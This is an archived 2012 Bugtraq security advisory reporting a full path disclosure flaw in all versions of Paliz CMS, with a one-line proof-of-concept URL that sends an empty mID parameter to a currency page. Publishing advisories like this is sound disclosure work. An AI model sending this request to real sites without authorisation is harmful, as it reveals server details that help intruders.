[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Paliz CMS Full Path Disclosure Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Paliz CMS Full Path Disclosure Vulnerability
From: advisories@xxxxxxxxxxxxx
Date: Sat, 25 Aug 2012 05:44:08 GMT

##################################################################################
# Title: Paliz CMS Full Path Disclosure Vulnerability
# Vulnerable Version: all versions
# Vendor URL: http://palizct.com
# Impact: Low
##################################################################################

===========================
Vulnerability Description:
===========================
Full Path Disclosure Vulnerability, enable the attacker to see the root path.

==================
Proof Of Concept:
==================

http://[target]/portal/DeskTopModules/Currency/CurrencyAll.aspx?mID=[]

=========
Credits:
=========

HighSecure.ir
Contact: advisories[aT]highsecure[dOt]ir

============
References:
============

http://www.highsecure.ir/research/20120822-paliz.txt

##################################################################################

Prev by Date: Chamilo 1.8.8.4 Multiple Vulnerabilities
Next by Date: Exploit Title: Mihalism Multi Host v 5.0
Previous by thread: Chamilo 1.8.8.4 Multiple Vulnerabilities
Next by thread: Exploit Title: Mihalism Multi Host v 5.0
Index(es):
- Date
- Thread